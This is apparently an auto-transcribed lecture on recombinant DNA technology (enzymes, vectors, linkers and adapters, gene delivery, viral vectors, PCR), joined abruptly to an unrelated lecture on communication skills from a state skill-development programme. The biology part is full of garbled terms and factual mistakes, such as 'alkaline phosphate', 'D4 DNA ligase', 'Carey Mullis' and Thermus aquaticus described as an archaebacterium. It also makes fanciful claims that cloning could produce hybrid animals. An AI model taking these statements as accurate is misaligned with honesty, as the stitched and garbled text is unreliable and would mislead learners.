So, before going to the rDNA technology, every student should will I can say it is a by heart these enzymes, because they plays a vital role. The major enzymes are the alkaline phosphate, because it removes the phosphate group from the 5' end. You all are aware that there are two ends, one is called the 5' and other one is called the 3'. Generally the 3' end will have the free hydroxyl group and the 5' end will have the phosphate group. The phosphodiester bond will be formed between these two ends, that is from the 3' to 5'. So, if you would like to eradicate the self annealing of a DNA or primer, whatever it may be, we need to remove the phosphate and convert into OH. So, that can be done through an enzyme called as alkaline phosphate, and most of the students know that the most important enzyme in the recombinant DNA technology is the ligase, which joins the two nucleotides by establishing the phosphodiester bond. And nucleases you are aware that this particular enzyme is useful for removing the DNA or the cuts the DNA or shortening of DNA. And while you study the topic of replication, you heard about the polymerases, DNA polymerase 1, 2 and 3. So, polymerases are the main enzymes in the molecular biology, and these enzymes will be useful for synthesis of new DNA fragment from a template or from a parent. And DNA is an enzyme, DNase is an enzyme that will be useful for production of single stranded nicks in the DNA. And you all are aware that exonuclease is an enzyme which will remove the nucleotides from the 3' end or from the 5' end. So, the another important enzyme is called as polynucleotide kinase. These two enzymes are specific, because the alkaline phosphate will remove the phosphate and the polynucleotide kinase will add the phosphate. And the second row of enzymes which will play a vital role is called as restriction enzymes, because they cleave the DNA at a specific site. And the reverse transcriptase is an enzyme that will create or synthesize a new DNA from an RNA. And the last but not least, there is an enzyme called as the Taq polymerase, which will be used rapidly or widely in the process of PCR. So, this is a general picture where you are taking a vector called as a plasmid and cleaving that vector with a specific restriction enzyme and cleaving your desired DNA with the same enzyme, because the cleavage will be of a same pattern. Hence, you can add your insert into your plasmid at a specific site at a specific point. This is called as a restriction enzyme working out, I can say, and this will create a production of a new DNA by using an enzyme called as a ligase. Ligase is nothing but addition. So, if you can see this particular picture, the restriction enzyme will, if you add a restriction enzyme to a target or a plasmid, it will search for its site, and if it is a long way, it will jump or slide and reach the particular point, and there is a reaction called as a coupling, and it denatures the hydrogen bonds, and there is a cleavage. The cleavage of restriction enzymes depends on one type to other type, because some restriction enzymes will cleave in a pattern called the sticky ends or cohesive ends. They can attach easily, and the other one is called as a blunt ends. Please remember, my dear students, the blunt ends are the ends where there is a minimal chance that there will be fusion of these two blunt ends rather than the sticky ends. So, the blunt ends can be ligated with a special mechanism or special, I can say, DNA fragments called as a linkers or adapters, which we will read in the next few slides. So, every restriction enzyme has a specific sequence to cut, and if you see this particular picture, so this is a nucleotide, this is the structure of nucleotide, and this is a sequence of nucleotides, and this is a picture where these two nucleotides will be combined with a phosphodiester bond, and this can be happens through only ligase enzyme. And the cleavage can happen through a restriction enzyme. It might be hydrogen bonds or it might be a phosphodiester bond. So, once the cleavage is happened, they both can be ligated, new and the plasmid can be ligated by the ligase, and the reaction can be performed by different set of enzymes. And these are the different vectors which will participate in the process of rDNA technology. The smallest parts, the most widely used is called as a plasmids, but a vector should have an origin of replication ORI site,
which it starts the replication, and selectable marker where you can identify your recombinant DNA in a group of culture that has been cultured in the cultured after the cloning. So, the identification of a gene can be happens through the antibiotic resistant gene or through the production of an enzyme producing gene. It may be a LAG-Z. So, plasmids are the short vectors or a small vectors which will carry a small DNA, and the second group of vectors are called to be the cosmids, which are somewhat bigger than the plasmids, and these two are artificially made. And the third group of vectors are called to be the phase vectors, which you are all aware that the plasmids or the vectors, the phases, the phase virus will attack the bacteria, and you already read in the topic of transduction. And the fourth and fifth important things are called as a BAC and AC, or bacterial artificial chromosome and yeast artificial chromosome. The bacterial artificial chromosome and yeast artificial chromosomes are the two vectors which has a sequence of a large sequence, and which can be useful for incorporating a big sequence of DNA. So, if you take an insulin gene, it is a small gene. If you would like to insert a big gene which contains more than 2000 or 3000 nucleotides or the base pairs, that can happen through the big vector, so called as a BAC, or generally used as called as a AC. So, here if you see this particular picture, this is a vector where you will insert your required DNA. So, I already told you that inserting your DNA required or DNA which you require or desired or insert into a plasmid or a vector can happen through ligating the linkers and adapters. So, adapters will place a vital role in addition of these two particular blunt ends, and the vectors which have been combined with a DNA which you require, they are called as rDNAs. These rDNAs should be incorporated or transformed into the bacteria for the culture to get your product. So, that can be termed as a gene transfer, which we will discuss in the next topics. So, this is a common slide where total aspect of DNA was given, and this is the final cloning that you have cultured after the recombinant DNA. You have cultured your recombinant DNA in a through the bacteria, and it can be screened by the antibiotic resistance or blue white screening, which will be useful for identifying the LAG-Z gene or enzyme producing gene. So, this is about the rDNA technology, and in this rDNA technology, the aspects that will be used are called as adapters and linkers. So, adapters So, what are mean by adapters and linkers? These are called as a coupling tools. So, I already told you that there are sticky ends and blunt ends. So, both has to be ligated to the plasmid. Some restriction enzymes will cut in a blunt way, and some restriction enzymes will cut in a sticky way. So, they can be ligated by using the linkers and adapters, and other type is called as a homopolymeric tail, which has a sequence of long tail of A and T or G and C. So, linkers are double stranded DNA which are self complementary oligomers, and they have a specific restriction site. That means, if you add a linker to a plasmid, or if you add a linker with a desired DNA or a insert, they cleave with the same pattern because it has to be added to the plasmid or to a vector. And after addition, these linkers can be ligated by using a D4 DNA ligase, which is very effective ligase. And if you can see this particular aspect, maybe it is not clear to you, but I'll show you the next picture. So, this is a target DNA or the insert which you are going to add, which has a blunt end. So, you are adding two different linkers here
and you are using a restriction enzyme, and this restriction enzyme is cleaving that linker in such a pattern that it is getting a cohesive end. Look at this, and it can be added easily to the plasmid. If you can look at the second picture, look at these this is a plasmid where you have cleaved with the restriction enzyme, and you are cleaved with the same using the restriction enzyme, you cleaved the DNA, desired DNA in the same pattern, but it is having a blunt end. This blunt end has to be added to this portion. So, how it will be added? It might be added or it might not. If it doesn't work out, you need to use a aspect called as adapters or the linkers. So, if you look at this particular picture, these are the blunt DNA fragment that you are taking, and you are using a linker. It is a EcoR1 linker which has a specific sequence and it has a restriction site. So, there will be formation of a phosphodiester bond between these two. You are adding these two, and now you are cleaving with the restriction enzyme, so that you got a cleaved ended a target DNA which can be easily inserted into the plasmid. So, this picture has clearly given the description. This is a short DNA, okay. This is a target DNA. Now, what you are doing here is you are adding your linker with this DNA. Now, you are using a restriction enzyme that has been cleaved into a specific portion. Now, it can be ligated easily with the plasmid. That is the beauty of the linkers, and that is the beauty of the technology. And these are the different uses that can be used by the linkers, and the most important thing is it will be used in the diagnostic purpose and tagged with the fluorescence, so that you can find out find out your requirement, and generally it will be used in RT-PCR and also in the southern blattings. So, there are a lot of limitations in the usage of linkers. We will discuss in detail in next slides. So, what are the adapters? So, adapters and linkers are little different. I can say kindly see this picture here. So, both are little there is a little variation. The linkers are blunt ended, but the adapters having the sticky end. So, if you see the linkers will be added to a foreign DNA. It looks like a blunt end like, and it will be cleaved by using the restriction enzyme, and the same restriction enzyme will cleave this plasmid, so that these two will become the complement. But when it comes to the adapter will have a blunt end at one point and a cohesive end at the other point, so that it can be added easily with the target DNA, and the same thing will be added to the plasmid, which has a complementary to the vector. It might be a plasmid or anything. So, these adapters are double stranded oligonucleotides, as if we know that, and they have the protruding sequences which will be seen and which will be different from the linkers. So, this is a general picture which will totally depicts the structure of these adapters. Look at, we are adding the adapter in this sense, but sometimes we need to enhance the length of the DNA, so that the two adapters can be ligated like this. If you do not want to ligate these two adapters, what we need to do now? Imagine this is a 3' end and this is a 5' end. We need to remove the phosphate from this particular junction, because it should not ligate. Then this can be performed with an enzyme called as alkaline phosphatase. If you want to ligate this, what we need to do? We need to use an enzyme called kinase. So, that is the difference between the alkaline phosphatase and PNK. So, the self ligation sometimes may be prevented, and some self ligation sometimes it has to happen. So, these are two different types of varieties of adapters which will be seen, and they have a sequence, and they have a different varieties basing on their nucleotides. And coming to the aspect of adapters linkage, the DNA ligase cannot form phosphodiester bond between the 5' OH and 3'. I already told you that while you delete or while you terminate the phosphate, it will become OH. So, this can prevent the formation of a phosphodiester bond, and this can prevent the self ligation between the adapters. So, the third most important thing in the ligation is called as a homopolymeric tailing. So, this technique which had a speciality that here you will use an enzyme called as a deoxynucleotidal transferase. The enzyme itself has a stuff, I can say, because it is transferring some deoxynucleotides which may be
DATP, GTP, whatever it may be, the 4 nucleotides. So, the transfer of the nucleotides to the terminal part of the DNA. So, the terminal part of DNA which has, if you can look at this particular slide, look at this is the target DNA. So, it has a blunt end, you do not have the elongated end. Now, you are using a enzyme called as the terminal transferase. So, what it will do? It will simply add the nucleotides, a common nucleotide. So, it is called homopolymers. So, nucleotide is a monomer, adding different monomers become a polymer. So, it is adding a Cs, okay, cytosines at this place. At the same other end of the plasmid where it has to be ligated, it is adding the Gs. So, look at the beauty that the G can form a bonding with the C. Obviously, these two can be ligated in such a way that they will form a recombinant DNA. So, these type of ends are called as a homopolymeric tail endings, and the enzyme is called as terminal transferase, which has an importance. And there are many factors called as a magnesium and cobalt which enhance the reaction, and this is one of a special linkers, I can say linkers, adapters, and the homopolymeric tails are the add-ons which can add the blunt ends sometimes with the plasmid or blunt ends with the desired DNA with a vector. So, in the recombinant technology, just recollect once that we have already told you that process of recombinant DNA technology. We have given a description of vectors. Now, we are talking about the insertion of vector with the plasmid by using this technology. So, there are multiple more applications which are connected to this topic, and we will study in detail in the next slides. So, coming to the aspect of the applications of these linkers and adapters has a wider role that will be used in different technologies. So, the double stranded or single stranded DNA will be labeled so that we can identify, and they will be used in rapid amplification of cDNA ends, and also used in situ localization of apoptosis, and this corresponds to a topic of linkers, adapters, and homopolymeric tails. So, coming to the topic of the delivery of that particular vector into the host. So, so, what it meant by gene delivery? So, you have prepared a recombinant DNA and you have inserted the required DNA into a plasmid or a vector, whatever may be the vector, and you are going to deliver into a host. So, the delivery of your recombinant DNA into a host may varies from the cell to cell. In bacteria, you will use a word called as a transformation, and it will be induced or it will be enhanced by the calcium chloride. And transduction and electroporation are the two processes. And plant cells, you will find the transfection, and most commonly used is called as agroinfection and liposome fusion and particle bombardment. In animal cells, or the animal recombinant DNA can be transformed into, it can be incorporated into the host cell by the transformation, electroporation, microinjection, particle bombardment, liposome mediated gene transfer, and virus method, which is one of the important methods while you compare with the other methods. Please remember, dear students, the two aspects of this gene transfer depends on only one particular schematic representation. One using the mechanical methods, and other one by using the biological method. So, virus vector method will come under the category of a biological method, and other mechanical methods like the electroporation, microinjection, particle bombardment, these will come under the mechanical way of inducing or a mechanical way of incorporating your DNA or the gene into your vector. So, I would like to explain these following methods in detail.
So, what it meant by electroporation? Name itself indicates that there is an apparatus called as an electroporator apparatus, where some polar molecules, kindly see this sentence, introduction of polar molecules into the host cells by high voltage electric impulse. You are giving an impulse. So, we are aware that the plasma membrane is a charged membrane. So, by giving this little electric impulse, there will be a variation in the plasma membrane that can be termed as a creation of a porosity. So, that porosity or the formation of pores will be useful for the delivery of your desired DNA into the cell, and that is why it is called as a electroporation. So, if you can look at the process, we are going to introduce the DNA molecules into the host cell, where you are increasing your impulse or the electric impulse to 10,000 to 1 lakh volts or microvolts. So, this will be from milliseconds to microseconds to milliseconds. Then that disturbs the plasma membrane for the creation of a temporary aqueous pores. So, these aqueous pores will be useful for the transportation of your desired DNA into the cell. So, here while you use this technique, especially in the plants, you have to remove the pectin, because that only inhibits this entry. So, if you remove the pectin, there will be easy or the increase of DNA poration into the cell. And in some plants, the tobacco mosaic virus used in tobacco protoplasm, and it is one of the successful method for incorporation of the DNA into the host cells. And the second most important is the micro injection. Name itself indicates that there is a micro needle, and you already taken a quantity of DNA or the recombinant DNA. Directly you are incorporating that DNA into the cell by keeping a holding pipette. So, this is also one of the important methods generally used in the animals, especially called as a gene transfer or gene transfection in the mammalians or mammals. So, the holding pipette, it sucks and holds the target cell, and you are inserting your concerned or the desired DNA into the cell, and there is no requirement of any marker gene, and there is no requirement of any what I can say specialized mechanisms, and target gene can directly enters into the host cell, and you need to use a little dye for knowing the DNA or for marking the DNA whether it is there or not, and it will be useful for creating the transgenic mammals. And the third important method is called as a gene gun method. It is also called as a biological ballistics. The name itself indicates the ballistics are nothing but the weapons which has the ballistics are the biggest weapons which will be used in the military, where it has a highly projectiles. They will be projected from land to air. So, they will create lot of energy, and they will move from one place to other place by producing lot of energy. So, the process also similar to that particular word, so that it is given as a biological ballistics. So, high velocity micro projectiles will be delivered from the mission, and that micro projectiles are the micro particles which contains your desired DNA. So, along with the micro projectiles, look at that micro projectile mediated transformation. So, this will be useful for the transformation of your DNA from the part to the particular host cell. So, with a high acceleration, your particles are moving. So, the basic equipment to generate the acceleration, it's a stable process, and it will be coated with two materials called as a gold or tungsten. So, it is a little costly affair, but it is a non-toxic, and it is a micro size and high density with a rapid penetration. So, look at this apparatus. You are using a helium gas and pressurizing or accelerating, hence your particles will move by chasing or a special screen called as stopping screen. But the stopping screen will stop the macromolecules of the particles and allow the micro particles which enters into your host cells. So, that is a beauty of the gene gun method, and this is an apparatus structure which generally available in the market. And there are certain disadvantages. What are the disadvantages? It is a costly consumables, and there will be a random integration, and associated cells may be degraded or damaged by this gene gun method, and there might be chance of multiple copy entry which will be seen through this gene gun method.
And coming to the liposomal gene delivery, the liposomal gene delivery is a method, a sweet method I can say, because we all know that the plants or animals or the cell wall is made up of lipids or proteins and lipids. So, you are inserting your desired DNA into a liposomal vesicle, and that liposomal vesicle will be added to the host cell. Obviously, these lipids will combine, or the entry will be enhanced by adding a substance called as a polyethylene glycol. So, this is called as a liposomal gene delivery. So, what are the advantages and disadvantages? There are a lot of advantages because it does not require, it is not a toxic, and there is a less chance that we does not coat with any gold or any material, and it eliminates uses of potential virus or toxic substances. The disadvantage is there might be chance that target tissue should have the regeneration capacity. This is the most important thing, and random integration may happen, and associated cells may have a problem of I can say there is a demarcation. So, the basic advantage of liposomal transformation is that it is not a toxic, and they can protect directly from the nucleases which are present at the nucleus, and rDNA can be stored in the liposome for a long time. This is the most important thing in the liposomal transformation or liposomal fusion, and the risk of potential is very low. So, last method is the polyethylene glycol mediated transformation, where the naked DNA can be transformed into the cell by utilizing PEG with the presence of a divalent cations. So, there are little disadvantages in this technique, and always there is a advantage and disadvantage in usage of any technique. So, the second most important thing is usage of the virus, and these viruses are, you know that they are very dangerous. They have the tropism, they have the viral genes, they have the pathogenicity, they have the immunogenicity and pesticide. So, every student have a feel that if you use a virus, what will happen to our cells? Remember, my dear students, that we have to identify the viral genome and shut off some of the genes which will cause a damage to your cell, and that those viruses are called as a replicon or replication incompetent viral vector for in vivo gene transfer. So, these are categorized in many ways. I will give you a few examples. The one is called as a retrovirus. This has two specialities. One being derived from, it is called as a molyneurin leukemia virus, and the beauty of this virus is this will contain an enzyme called as a reverse transcriptase. You all know that the reverse transcriptase is an enzyme which will convert the mRNA to, or preparation of a DNA from an mRNA. So, if you insert this particular virus, or if you use this virus, the mRNA can be transformed into DNA, and that DNA will be useful for the other processes, especially for the cancer. So, virus generally used in two ways. One is the short term and the other one is the long term. So, some viruses are used for long term expression, therapeutic transgenes I can say. So, this long term expression can happen through some viruses. It all depends on the capacity of the virus. So, the main delimitation to this virus is it cannot act on the non-dividing cells. So, the dividing cells only can be, in the dividing cells only this virus can activate, or this will incorporate its genome, and this will happen, and non-dividing cells it does not work out. And look at the procedure. You have inserting a healthy gene into the viral genome, then this viral genome through the virus, it is affecting or it is attacking the unhealthy cells, and this may be converted into normal cell or production of a normal cell in a rapid number, which will be useful for the patient recovery. The second one is called as a adenovirus. This is a specialized virus which has a capacity of 36. The retrovirus is having a capacity of 8 kb, that is carrying capacity of a DNA. So, it can carry more DNA, but the thing here is it will show the effect both on the dividing and non-dividing cells, but it cannot insert its genome into the host chromosome. That is only the defect of this particular virus, but expression will happen, and initially it stays in the host cell for few months. So, expression time is important. So, the limitation is it shows the high immune response. If a virus is enter into a human cell, obviously the immunal reaction will happen. So, that immunal reaction should be minimized, immunosuppressors will be used. Hence, the adenovirus will cause a high immune response, and that is one of the limitation to this virus.
And the third important virus is a lentivirus. You all know that HIV virus, one type of virus, and there is a lot of ethical issues are going on this virus. This also contains reverse transcriptase, and it integrates a capacity of 9 kb, and it has the characters of retro and adenovirus. That is the beauty of this particular lentivirus. And the important aspects of this virus is it has a prolonged transgenic expression. Look at it, has a prolonged it can express its activity up to 1 year. That means in the therapeutic use, if you are using this particular virus, the patient may be survived because of this particular healthy genome that has been incorporated into the virus to the particular patient, and it can be expressed till 1 year. That's a positive of this particular lentivirus. And the second and the fourth most important is called adeno-associated virus, and hence this is the smallest virus, and it's not a dangerous virus, I can say. And the only negative or only limitation to this virus is it has a small genome. It cannot carry a long bit of genome. And the second most important thing is it will replicate with the help of other virus. That is only the defect of this particular virus, and it affects only on one particular chromosome, that is called the 19th chromosome. So it is also widely used in the in the gene technology. And the other virus is vaccinia. This is the largest double-stranded DNA with a 200 kb capacity, that it can carry more amount of DNA, and it can infect any type of mammalians, especially the neural cells or the neuron cells. And it is a non-integrating and short-term expression. It can't express for more than years. And the potential therapeutic treatment of solid tumors are nothing but one sort of a cancerous cancerous habit seen in the humans, and vaccine is widely used in this process. And the limitations are it produces a cytotoxic T cell response, which is an immunal reaction, and they are not used in treating the chronic disease because of the cytotoxic effect. And last one is called the herpes simplex virus. This is also a specialized virus which has a capacity of 150 kb, and it can carry the capacity of 30 kb, and it can infect both the dividing and non-dividing cells. Imagine if a virus is infecting a n number of cells, that means any type of cells, they can attack the neural cells, because any damage, if it happens to neural cells, it is not curable. It can be cured by using the gene therapy and by a technology through the virus. And it has a non-integrating unit and persists in the cytoplasm for the years. Look at this. The persistent in cytoplasm for years has a latent episomal state. So we can use this virus for longer time, and high cytotoxicity is one of the limitation for this virus. And this is that overall differences between different viruses that will be used in this transfer of recombinant DNA into the host. Right. So coming to the aspect of last aspect, that is called as a polymer chain reaction. Most of the students are aware of this topic. So this is a mechanical process or mechanized process for the production or amplification of DNA. Remember, my dear students, you need to study this topic in a systematic way. The first topic is about the cloning, and the second topic is about the recombinant DNA technology. The third topic is the biological vectors, and the fourth one is mechanical transfer of the gene transfer to a concerned host. So the process is very clear that we are using biological organisms for the transfer of your gene into a host. That's what we discussed so far. But if you see this topic, this is linked to a topic called as a replication. We are studying this replication since intermediate. So replication is a process of production of DNA from the parent DNA. You need to replicate, or else the cell, if the dividing cell is dividing in a rapid way, the DNA percentage may decrease. So the replication process almost implies to the polymer chain reaction. So you are amplifying your desired gene in a machine called as a thermocycler. The beauty of this particular polymer chain reaction is a polymerase. You are using an enzyme called as a polymerase, which has been
derived from a specialized bacteria called the Thermophilus aquaticus, which is an archaebacteria which lives in a spring, I can say hot waters or spring waters, and that bacteria can sustain in a temperature of 80 to 100 degrees. That's the reason they use this bacteria and use that particular enzyme called as Taq polymerase. And after the discovery of the PCR, the biotechnology has a tremendous drift has been taken, because different types of PCRs are there and different type of amplifications are going on, and the PCR inventor, so called as Carey Mullis, has been awarded Nobel Prize in 1993. So look at, if you got a sample, the sample may contain a DNA. You don't have a larger portion of DNA. So if you lost this DNA, you cannot identify what it is. Then you can take the DNA and amplify the DNA into multi number of copies, and you can identify or characterize a particular specimen or whatever it may be. So generally the PCR is if you remember the forensic cases, a little drop of blood or little drop of semen or whatever may be the component that have been available for the corpse, they will take and they will use this PCR technique for identification of the damages, I can say. So there are a lot of contents in the PCR, and we will go ahead as the time is very short. So the main processes are the initialization, denaturation, annealing, and elongation. What you are doing now, you are taking a DNA fragment and you are amplifying into number of copies. So what you need to add is important. 1, the amplifying units are called as a DNTPs. 2, the addition can be occurred by the polymerase. 3, it has to occur in a sequential way, be in a machine called as a thermocycler. So at about the principle, you all know that. So a cycle is nothing but it consists of 3 fragments: 1, denaturation of double stranded DNA, what you are expecting, and annealing of primers, and extension of DNA molecule, DNA into number of copies. The used structure or used mechanical structure is called as the thermocycler, and one cycle consists of these three elements. So DNA, you are taking some example, you are taking an insulin DNA or insulin fragment or a gene. You would like to amplify the DNA. So you are taking that a particular DNA, it may consist of long or short DNA, and you are using a process. That process is different, and process should be understood by the students. So these are the different chemicals that has been used in the process of PCR, and this magnesium chloride it will be useful for stabilizing the reaction, and there will be usage of some dyes which will give the coloration to the PCR. So in the initialization, what you are doing is you are making the DNA into fragments. So fragmentation can be happen in the replication by the enzymes. It may be topoisomerases, it may be gyrase, or it may be of helicase, like that. But in this process, what is happening here is you are separating these two the DNA fragments or the templates. That means you are breaking the hydrogen bonds. The breakage can happen through by raising the temperature to 92 to 94 degrees centigrade. That is called as a denaturation. You are denaturating the DNA and separating the fragments. Number 2, after the separation, you need to use the primers that will develop, that will be useful, that act as initiators for formation of a new strand. So the primers are of 2 kinds. One is called the forward primer, second one is called as a reverse primer. And please remember, the process of addition of primers is called as annealing. Annealing is you are adding a specialized fragment to your DNA. Once you are separated, then you are adding something to it for elongation of the DNA. So that annealing happens by decreasing the temperature. So you have to decrease the temperature to 50 to 70 degrees. The ideal temperature is 58 and 62 degrees. Then once the primer get added, then I already told you that there is an important enzyme called as a Taq polymerase, which is extracted from a thermophilus bacteria. It can act. Generally, the enzymes will denature by increasing the temperature, but this will be active while increasing the temperature. So the extension of this particular primer stand happens by adding the nucleotides. They are called as the DNTPs. So DNTPs will be added to each nucleotide by this enzyme called as a Taq polymerase, by which the strand will grow.
So, one is parent strand, the other one is a new strand. Hence, you are producing a new different 2 strands. This is called to be the extension. This can be termed as an extension. So, you will produce multiple number of copies by using one particular DNA, and one cycle consists of 3 units called as denaturation, annealing and extension. Like that, 2 to the power of n number of cycles will be performed, and in generally the cycles may vary from species to species. So, here you will see a single copy of DNA strand over at 1 trillion copies may be generated by the 40 cycles. So, 40 minutes I can say. So, each cycle will be performed by a particular time, and n number of copies will be produced, and each DNA or the desired DNA can be extracted by using a method called as, or identified by using a method called as a electrophoresis. So, this is the DNA marker that you are using, and these are the amplified DNAs in each cycle. So, you can identify whether your DNA is produced in the sample or in the content that has been inserted into the thermocycler by using a method called as a electrophoresis. And this is the graph that is showing the total processes. One, you are raising the temperature to 94 degrees or 96 degrees, and with the time the primer annealing happen where you are decreasing the temperature. Once again you are increasing the temperature to 70 degrees for the extension of particular sequence. So, this is called as one particular cycle. And there are many errors that may happen in the PCR, that the composition of DNA is very important, because you all know that the DNA, the GC component in the DNA will plays a vital role, because they have the triple hydrogen bonds, where the GC component is more, there might be chance of usage of much more energy. Second, there might be chance of primers that they can self anneal, and it can be stopped by using some chemicals in the addition of primers. And the long DNAs may be generated by the PCRs through the PCR, but sometimes there might be chance of depurination may happen, and that can be avoided by using the high pH buffer and decreasing of denaturation temperature and use of proof-reading DNA polymerases which are available in the market. And the DNA polymerase choice is very important, use of color DNA polymerase, and buffer is also important for production of a good amount of amplification. So, if you come to the types of DNA PCR, there are a lot of PCRs that have been available, and in that I'll quote you 2 examples. One is called the reverse transcriptase PCR. This is one of the best method where you can take an RNA and convert into DNA, and you can prepare a new DNA which is a desired one. So, that is also available, and different type of PCRs are available. Real time PCR, this PCR is a real time, name itself indicates that. That means in every step you can identify the contents or amplicons through a chemiluminescence. That is a specialty in real time PCR. And hot start PCR, it will be a temperature regulated PCR, and inverse PCR, it will make the DNA, linear DNA into circular DNA, where your desired DNA will be present at middle at first, and later by converting it to circular, it will be cleaved by the restriction enzymes, and the 2 ends of your linear DNA will consist of your desired DNA. And colony DNA PCR, it's a special type of PCR where the colonies of bacteria can be produced by, or expression gene can be produced, and nested PCR is a one type of PCR where 2 different primers will be used. Generally we use the one pair of primers. Here you will use 2 primers for production of different aspects. So, this is a technology. And finally, I would like to conclude this topic in a clear way. If you use this recombinant technology in a positive and negative way, if you use the cloning method, you may have the positiveness like production of a Albert Einstein, and you may have a negative effect, that production of a negative impacted persons. And these are some of the pictures where the students generally used to like. There might be chance that production of a puppies from an eggshell and monkeys with tusks. So, this might happen. And look at this, is a skatefish which has been, if it cloned with a butterfly, it doesn't happen, but if may happens, there might be chance of the butterfly like skatefish will be seen in the sea, and the hippocampus with a crab, and rhinoceros with a fish, and deodon fish with a parrot which has the spiny edges. And finally, the elephants with a seal maybe conjointly form a new structure, and ostrich with antedon.
So, this is about it's a big topic, it's a huge topic, but I try my level best for concluding this topic, and I request all the viewers, my dear students, to read the topics in a clear way, in a strategic way, because they will play a vital role in your examinations, especially for your PG examinations. Thank you very much. Welcome to today's session. So we are covering the communication skill sessions for ESC program, the employability skill centers across Andhra Pradesh, and this is organized and brought to you by AP State Skill Development Corporation. Till last week you went through the aptitude and cognitive skills, where another trainer by name Satish, he took you through a very comprehensive session on all the aspects of aptitude. And I'm going to take care of communication aspects, where the idea is to give you a holistic skilling. So in the last session, we spoke about what communication is, and I spoke about the communication tree, how it's very different from what you have learned in school. Then I spoke about the essentials of effective communication, and these are the essentials of effective communication, 6 of them: assertiveness, authenticity, open-mindedness, empathy, clarity, and listening skills. I spoke in detail what each of these points mean, gave you certain examples. Now I'm going to take it forward today. Now, communication type, we often hear different types of communication. So when 2 or more than 1 person or 2 people are speaking face to face, that is called a verbal communication. Now, the common myth that we have is only a face-to-face communication is verbal, or it's actually called an oral communication. Anything that is written is actually deemed differently. The mistakes that people do is, if some communication is done orally, they call it a verbal communication. For example, they say that, for example, if I'm talking about some kind of memos or some kind of information, say for example you're studying in a college and somebody came and announced it in the classroom that tomorrow there is a holiday, and there is no written memo, there is nothing on the notice board. So people usually say, we were informed verbally, there is no written communication. Now that is wrong. A written communication is also a verbal communication. Verb means action, so anything that's in terms of oral communication, where 2 people are speaking, or when there is a communication in terms of a speech, that is oral communication. When there is a communication in terms of written item or anything that is written, it could be a memo, a text message, an email, or handwritten note, or a PowerPoint presentation. Anything that is written and printed is also a verbal communication. So that's again a myth. So I want to break that. Even a written communication is called verbal communication. Then another type of communication is non-verbal. Now what do we mean by non-verbal communication? Now these are gestures, expressions, body language. Now body language is a separate area which needs a lot of expertise, which needs a lot of improvement, both in terms of the person who is displaying these gestures, expressions, and body language, or the other person who is the audience. Now your body language is also an extension of your character in terms of your nature. The way we use our hands, the way we use our expressions speaks a lot about what you are thinking and what you're trying to say. I may be saying something, but I may not mean it, but what I mean can be understood with my body language. When we go for interviews,
when we go for any kind of presentation, any kind of conference, seminars, when we are speaking to one person or many people, we still judge that person not just by the way the person is speaking, but a lot is derived in terms of body language. Now, the body language is a completely different ball game. You need to understand, you need to learn, and you need to be an expert in terms of displaying the right information, in terms of using the right body language. So there will be a separate session on body language only. So we'll talk in detail about that later. So please remember, communication type is of two types. The first one is verbal communication, where we talk about oral communication as well as written communication. So written and oral both are verbal communication. Non-verbal communication is gestures, expressions, body language. So to put it in a simple way, when you're not speaking a word, when you're not writing a word, you are just using gestures. There is no sound, there is no letters written or read. That is non-verbal. And verbal is when you hear or when you see or when you are reading something, that is verbal communication. Okay. Now, I'm going to talk specifically on oral communication, because a lot of us, when we talk about communication aspect as such, there are two things which you need to remember or to understand clearly in terms of what is considered as what we call this person is good, that person is not good, when we judge someone in terms of communication. So on an average, every person, especially the student fraternity, since you are from a vernacular background in terms of your education or academics, you're considered as a person who needs a lot of improvement in terms of communication. And we always say that improve your communication, otherwise you will not get a job. Now, that's not completely right. I want to tell you that when we talk about communication expertise or your level of communication, there are two things which you need to take into consideration. Let me quickly display what do I mean by that. Okay. The first aspect is articulation. The second aspect is comprehension. Okay, let me align it correctly so that it's clearly visible. Okay, so there are two aspects, articulation and comprehension. Now, what do I mean by articulation? Ability to express ideas, in a language. All right, that is what articulation is all about. Let me change the color so that you can make a note of it. That is what it means. Ability to express ideas in a language. Comprehension, what do we mean by comprehension? Comprehension means ability to understand in a language. Now, the issue that most of us face today, now that I'm speaking to you, you are able to completely understand what I'm saying, right? So comprehension is something, this is not an issue. So let me mark it as green. So comprehension is something which is not an issue because you are able to understand what I'm saying. It may not be completely, but to an extent you are able to understand. But when I ask you to speak, you find it difficult to express yourself in a language. Now, when I say in a language, that means a language which is different from your vernacular language. Now, almost everybody who is watching this program in Andhra Pradesh, your vernacular language is Telugu, right? Now, I am not good at Telugu. I cannot understand very clearly, but to an extent I can understand, but I can't speak very well.
I cannot use the right words, I can't use the right grammar, and of course the pronunciation, which means my articulation is not as good as my comprehension. The same thing applies to all of you. When it comes to English language, your comprehension is better than your articulation, which means you are not able to express yourself only in English. But if I say that you can speak in Telugu, you are very quick to respond any kind of question. You are confident, you are not nervous, you have a lot of information which you can express yourself through. But when it comes to comprehension, understanding, you find it easier. But when it comes to speaking, you find it difficult. So two aspects, articulation and comprehension. Now in order to resolve this issue, you need to go through a little bit about oral communication itself. Now when we talk about oral communication, there are 4 fundamental cornerstones or pillars that you need to understand and you need to master yourself in. So like any other language, in English language, when we speak specifically about oral communication, it's not written communication, I'm here talking about oral communication only. There are 4 fundamental pillars. What are these pillars? The first one is pronunciation. Make a note of these. The second one is grammar. The third one is vocabulary. And the fourth one is fluency. So it's PGVF. Pronunciation, grammar, vocabulary and fluency. These are the 4 fundamental pillars of oral communication. And we're going to talk about each one of them in detail because my intention is to make you better in terms of your oral communication. Alright, let's begin. So what do we mean by pronunciation? In order to do that, we need to understand the fundamentals of it. In order to understand the fundamentals, you need to understand the entire structure of a language. So if I look at a language as a tree, which is called a communication tree. Now this tree, if I have to segregate or if I have to break it down, first and foremost, in order to communicate, I need something called a language. Okay, let me align it correctly so that you can see it clearly. Okay, so you have communication tree for oral communication. First thing that you need is a language, any language for that matter, but here we are talking specific to English language. Now this language or any language can be broken into sentences. So in a language you basically speak sentences. The sentence is broken into words. Now words will be broken into letters. That is what everybody talks about. We break the language into sentence, the sentence into words, and the words into letters. But this is where you go wrong. We are talking about oral communication. When I say oral communication, I'm speaking and you are hearing or listening, which means the words are not broken into letters, they are broken into sounds. Now when we speak about pronunciation, we should speak about the sounds, not the letters. So what do we mean by pronunciation with that example? Pronunciation refers to the way in which we make the sound of words. It also means creating correct sounds using the muscles of our mouth, tongue and lips, etc. There are other important aspects of pronunciation, which is word stress, sentence stress, linking, intonation. Now what do we mean by these? Word stress, for example, emphasis on certain syllables in a word. Let me show you an example. I am going over to the next slide so that I can give you an example of word stress.
